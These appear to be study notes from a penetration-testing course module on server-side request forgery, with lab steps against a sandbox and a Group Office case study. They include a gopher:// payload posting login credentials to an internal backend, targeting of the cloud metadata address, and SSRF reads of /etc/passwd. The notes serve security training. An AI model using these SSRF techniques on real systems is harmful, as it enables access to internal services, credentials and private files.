Module 14: Server-side Request Forgery

Introduction to SSRF

Interacting with the Vulnerable Server

Example: Using a SSRF we could interact with the loopback interface of a vulnerable server which would ordinarily not be accessible otherwise.

Interacting with Back-end Systems and Private IP Ranges

Private IP Addresses

IP address range

Number of addresses

10.0.0.0/8

16,777,216

172.16.0.0/12

1,048,576

192.168.0.0/16

65,536

Using a SSRF we could also potentially interact with other systems on the internal network.

Testing for SSRF

Accessing the SSRF Sandbox Application

Start the VPN, VM, and add the IPs and hostnames to your hosts file.

Discovering SSRF Vulnerabilities

If we discover upload functionality via URL, URI, or link, we should test for SSRF.

SSRF Sandbox
SSRF Sandbox previewing http://www.megacorpone.com

Note that requests to other domains will most likely fail since the VMs in the lab environment do not have full access to the Internet.

SSRF Sandbox - Verify Link
Verifying http://www.megacorpone.com

Calling Home to Kali

Restarting the Apache HTTP Server

kali@kali:~$ sudo systemctl restart apache2

When we are performing this kind of testing in the real world, we should include a unique identifier in the URL. This would help us locate the attack in our log file.

Verifying the application requested a page from our Kali VM

kali@kali:~$ sudo tail /var/log/apache2/access.log
192.168.50.101 - - [15/Oct/2021:16:49:40 -0400] "GET /hello_ssrf_world HTTP/1.1" 404 491 "-" "python-requests/2.26.0"

Exploiting SSRF

Retrieving Data

Attempting to access the Status page
Using the SSRF vulnerability to access the Status page

Instance Metadate in Cloud

Some cloud hosting providers, such as AWS, use the link-local address 169.254.169.254 for their metadata services. Others provide access through DNS, such as Google Cloud, which uses metadata.google.internal. These may include sensitive/private information.

Bypassing Authentication in Microservices

Any security controls enforced by an API gateway on traffic entering the internal network would not apply to the traffic between two microservices since the traffic originates within the internal network

Alternative URL Schemes

An example file URI in Firefox

Checking the contents of the kali default homepage

kali@kali:~$ head /usr/share/kali-defaults/web/homepage.html        
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Kali Linux</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta name="description" content="Kali Linux is an Advanced Penetration Testing Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments." />
    <meta name="author" content="Kali Linux" />
    <!-- based on template from http://bootstraptaste.com -->
    <!-- css -->
An exception occurred
Accessing the contents of /etc/passwd using curl

Starting a netcat listener on port 9000

kali@kali:~$ nc -nvlp 9000
listening on [any] 9000 ...

Using curl to send a request with the Gopher protocol

kali@kali:~$ curl gopher://127.0.0.1:9000/hello_gopher

Netcat listener handling the Gopher request

...
listening on [any] 9000 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 56264
ello_gopher

Example HTTP GET request

GET /hello_gopher HTTP/1.1
Host: 127.0.0.1:9000
User-Agent: curl/7.74.0
Accept: */*

Sending a mock HTTP request over the Gopher protocol

kali@kali:~$ curl gopher://127.0.0.1:9000/_GET%20/hello_gopher%20HTTP/1.1

Netcast listener handlin gour mock HTTP request

...
listening on [any] 9000 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 56274
GET /hello_gopher HTTP/1.1
Accessing /status using the gopher protocol
Sending a POST request with gopher to /status
Double URL-encoding in HTTP Request body

Extra Mile

Use the Gopher protocol to send a POST request with the username "white.rabbit" and password "dontbelate" to the login endpoint to obtain a flag.
gopher://backend:80/_POST%20/login%20HTTP/1.1%0d%0aContent-Type:%20application/x-www-form-urlencoded%0d%0aContent-Length:%2041%0d%0a%0d%0ausername%3dwhite.rabbit&password%3ddontbelate

Case Study: Group Office

Accessing Group Office

Start the VPN, the VM, and add the IP and hostname to your hosts file.

Discovering the SSRF Vulnerabilities

Group Office login page
Group Office Start Page
The list of portlets we can add to the Start Page
The updated Start page including the News portlet
Group Office RSS Feeds window

Restarting apache2

kali@kali:~$ sudo systemctl restart apache2
Adding our IP address as an RSS feed

Checking our access.log file with tail

kali@kali:~$ sudo tail /var/log/apache2/access.log
192.168.50.105 - - [17/Nov/2021:10:34:02 -0500] "GET / HTTP/1.1" 200 10956 "-" "Group-Office HttpClient 6.5.77 (curl)"
HTTP history for addin RSS feeds
Proxy request in Burp Suite Repeater
The response content is a 404 page including our IP address

Access log contents include a request to /repeater

kali@kali:~$ sudo tail /var/log/apache2/access.log
192.168.50.105 - - [17/Nov/2021:10:34:02 -0500] "GET / HTTP/1.1" 200 10956 "-" "Group-Office HttpClient 6.5.77 (curl)"
192.168.50.105 - - [17/Nov/2021:10:55:39 -0500] "GET /repeater HTTP/1.1" 404 437 "-" "Group-Office HttpClient 6.5.77 (curl)"
My Account link
Updating a user's profile picture
Insert from URL dialog window
Submitting our IP address in the URL field

Access log contents include a request to /fromurl

kali@kali:~$ sudo tail /var/log/apache2/access.log
...
192.168.50.105 - - [17/Nov/2021:11:25:45 -0500] "GET /fromurl HTTP/1.1" 404 437 "-" "Group-Office HttpClient 6.5.77 (curl)"<c/r>
Burp Suite HTTP history with request to /api/upload.php
The bloblId is used in following request

Creating itworked.html and moving it to our webroot

kali@kali:~$ echo "it worked" > itworked.html
                      
kali@kali:~$ sudo mv itworked.html /var/www/html/itworked.html
Updating the URL parameter
The server responds with an error

Exploiting the SSRF Vulnerabilities

The server returned an empty response to our attack
Group Office Address book page
Downloading a blob
Retrieving our HTML page
Sending the SSRF attack to access /etc/passwd
Retrieving the contents of /etc/passwd
PreviousModule 13: Command InjectionNextModule 15: Insecure Direct Object Referencing

Last updated